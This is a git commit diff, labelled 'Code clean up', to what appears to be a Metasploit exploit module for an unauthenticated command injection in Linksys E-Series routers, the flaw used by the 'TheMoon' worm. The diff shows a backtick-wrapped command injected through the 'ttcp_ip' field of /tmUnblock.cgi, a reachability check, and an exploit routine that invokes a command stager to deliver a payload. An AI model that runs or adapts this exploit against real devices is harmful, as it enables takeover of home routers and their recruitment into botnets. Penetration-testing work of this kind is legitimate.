Code clean up
This commit is contained in:
parent
4319885420
commit
0ae75860ea
|
@ -15,14 +15,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
super(update_info(info,
|
||||
'Name' => 'Linksys E-Series TheMoon Remote Command Injection',
|
||||
'Description' => %q{
|
||||
Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command
|
||||
injection. Since it is a blind os command injection vulnerability, there is no
|
||||
output for the executed command when using the cmd generic payload. A ping
|
||||
command against a controlled system could be used for testing purposes. This
|
||||
vulnerability was used from the so called "TheMoon" worm. There are many Systems
|
||||
that might be vulnerable:
|
||||
E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900. This
|
||||
module was tested against a E1500 v1.0.5.
|
||||
Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command
|
||||
injection. This vulnerability was used from the so called "TheMoon" worm. There
|
||||
are many Linksys systems that might be vulnerable including E4200, E3200, E3000,
|
||||
E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900. This module was tested
|
||||
successfully against an E1500 v1.0.5.
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
|
@ -86,33 +83,39 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
"ttcp_ip" => "-h `#{cmd}`",
|
||||
"StartEPI" => "1"
|
||||
}
|
||||
})
|
||||
}, 2)
|
||||
return res
|
||||
rescue ::Rex::ConnectionError
|
||||
vprint_error("#{peer} - Failed to connect to the web server")
|
||||
return nil
|
||||
end
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("#{peer} - Trying to access the vulnerable url")
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => '/tmUnblock.cgi',
|
||||
'method' => 'GET',
|
||||
})
|
||||
if res.nil? or res.code == 404
|
||||
fail_with(Failure::NoAccess, "#{peer} - Access to the vulnerable URL is not possible")
|
||||
end
|
||||
if [200, 301, 302].include?(res.code)
|
||||
print_good("#{peer} - Successfully accessed the vulnerable url")
|
||||
else
|
||||
fail_with(Failure::NoAccess, "#{peer} - Access to the vulnerable URL is not possible")
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
|
||||
end
|
||||
end
|
||||
|
||||
def check
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
'uri' => '/tmUnblock.cgi',
|
||||
'method' => 'GET'
|
||||
})
|
||||
|
||||
if res && [200, 301, 302].include?(res.code)
|
||||
return Exploit::CheckCode::Detected
|
||||
end
|
||||
rescue ::Rex::ConnectionError
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
def exploit
|
||||
print_status("#{peer} - Trying to access the vulnerable URL...")
|
||||
|
||||
unless check == Exploit::CheckCode::Detected
|
||||
fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable URL")
|
||||
end
|
||||
|
||||
print_status("#{peer} - Exploiting...")
|
||||
execute_cmdstager
|
||||
end
|
||||
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue